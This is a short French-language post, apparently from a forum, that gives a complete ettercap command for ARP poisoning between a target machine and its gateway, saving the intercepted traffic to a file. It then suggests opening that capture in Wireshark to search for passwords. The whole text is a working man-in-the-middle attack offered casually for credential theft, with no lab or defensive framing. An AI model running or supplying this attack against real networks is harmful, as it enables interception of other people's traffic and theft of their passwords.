Voici un exemple d'utilisation d'ettercap pour faire du ARP Poisoning (mettre sudo devant pour ubuntu) :
ettercap -T -q -M arp:remote /192.168.1.101/ /192.168.1.1/ -w fichier_de_sortie
Ensuite on ouvre le fichier généré avec wireshark par exemple et on analyse à la recherche de mots de passe :)